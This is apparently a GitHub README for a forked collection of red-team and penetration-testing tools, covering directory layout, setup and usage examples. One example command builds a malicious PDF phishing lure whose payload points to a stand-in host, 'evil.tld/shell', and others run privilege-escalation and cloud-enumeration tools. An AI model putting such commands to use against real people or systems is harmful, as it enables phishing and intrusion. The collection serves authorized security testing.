Skip to content
/ Penetration-Testing-Tools Public
forked from mgeeky/Penetration-Testing-Tools

A collection of more than 170+ tools, scripts, cheatsheets and other loots that I've developed over years for Red Teaming/Pentesting/IT Security audits purposes.

License

MIT license
0 stars 545 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

redteammember/Penetration-Testing-Tools

BranchesTags
 
 

Repository files navigation

Penetration‑Testing‑Tools

A curated collection of 170+ tools, scripts and cheat‑sheets for penetration testing, red teaming and security auditing — collected and maintained by Mariusz Banach (@mariuszbit).

MIT License Stars

📑 Table of Contents

  1. About the repository
  2. Quick start
  3. Directory structure
  4. Minimum requirements
  5. Clone & update
  6. Finding the right tool
  7. Usage examples
  8. Contributing
  9. License
  10. Disclaimer
  11. Contact & credits

About the repository

This repository is the outcome of years of hands‑on offensive security work. Each script was born from a real‑world need to automate repetitive tasks, validate exploitation hypotheses or bypass defensive controls. All materials are provided for legal use only — test only systems for which you have written permission.

Key facts:

  • 170+ standalone utilities and cheat‑sheets
  • 9 major topical directories (clouds, linux, windows, …)

  • 85 % of the code is Python and PowerShell

  • released under the permissive MIT license

Quick start

1 · Install dependencies

Most scripts are portable and require no global installation. All you need is a recent:

  • Python ⩾ 3.8
  • PowerShell ⩾ 5.1 / 7.x
  • Standard Linux utilities

2 · Clone the repository with submodules

git clone --recurse-submodules https://github.com/mgeeky/Penetration-Testing-Tools.git
cd Penetration-Testing-Tools

3 · Run your first script

cd red-teaming/active-directory
python3 ADCollector.py -h   # show arguments help

Directory structure

Directory Description
clouds/ Auditing tools for AWS, Azure, GCP
file-formats/ File‑format fuzzers & analyzers (OLE, PDF, ZIP, …)
linux/ Linux privilege‑escalation and post‑exploitation utilities
networks/ Network protocol helpers, device emulators, scanners
others/ Miscellaneous scripts not covered elsewhere
phishing/ Email templates, tracking, campaign automation
red-teaming/ Active Directory, C2, AV‑evasion, OPSEC tricks
web/ Web‑app testing helpers, proxy plugins, exploits
windows/ Windows‑specific exploits and post‑exploitation

Tip: Most directories contain their own README.md or USAGE.txt with nuances.

Minimum requirements

Component Version Notes
Python 3.8+ Some scripts use asyncio, f‑strings, etc.
PowerShell 5.1/7+ PowerShell Core recommended on Linux/macOS
Go 1.21+ Needed by a handful of utilities under clouds/
gcc/clang For building C/C++ PoCs in windows/ and red‑teaming/

On Windows, it’s usually easiest to work from WSL 2 + PowerShell Core.

Clone & update

# initial clone
git clone --recurse-submodules https://github.com/mgeeky/Penetration-Testing-Tools.git

# update repository including its submodules
git pull --recurse-submodules

If you don’t intend to modify code, add --depth=1 to shrink download size.

Finding the right tool

  1. Search by name/keyword

    git ls-files | grep -i "azure"     # example

  2. Search by language with tokei

    tokei . -l PowerShell

  3. Search by function — look for tags in filenames (enum, privesc, bypass, c2, …).

Pro‑tip: open the repo as a folder in VS Code and use full‑text search (Ctrl+Shift+F).

Usage examples

The snippets below illustrate typical usage. Always read --help.

Azure enum session 
cd clouds/azure/az-flare
python3 azflare.py --tenant 12345678-90ab-cdef-fedc-ba0987654321 --all
Windows privilege escalation 
cd windows/privesc
.\Seatbelt.exe -group=system -outputfile results.txt
Phishing: generate a malicious PDF lure 
cd phishing/malicious-doc
python3 generate.py --template invoice.docx --payload https://evil.tld/shell

Contributing

  1. Fork the repo and create a feature branch: git checkout -b my-feature.
  2. Follow existing coding style (PEP 8 for Python, PSScriptAnalyzer for PowerShell).
  3. Add/update the README.md in your directory.
  4. Make sure you do not disclose any confidential data.
  5. Open a Pull Request describing your changes and including usage example(s).

Please read CODE_OF_CONDUCT.md before contributing.

License

The project is distributed under the MIT license. You are free to:

  • use it for private and commercial purposes;
  • modify and redistribute copies;
  • keep links to the original project.

See LICENSE for the full text.

Disclaimer

All scripts and instructions are provided as‑is. The author and contributors accept no liability for any damage caused by using this code. Use these tools only for legal purposes and only against systems you own or for which you have explicit permission.

Contact & credits

  • Author: Mariusz Banach / mgeeky
    Twitter: @mariuszbit
    Email: mb[at]binary‑offensive.com
  • Support the project: Buy Me a Coffee ☕
  • Huge thanks to all commit authors and the community for ideas and feedback!

Happy testing and safe bugs! 🚀

About

A collection of more than 170+ tools, scripts, cheatsheets and other loots that I've developed over years for Red Teaming/Pentesting/IT Security audits purposes.

Resources

Readme

License

MIT license

Code of conduct

Code of conduct
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages

  • PowerShell 44.6%
  • Python 44.2%
  • Shell 5.0%
  • Ruby 2.0%
  • VBScript 1.2%
  • C++ 1.0%
  • Other 2.0%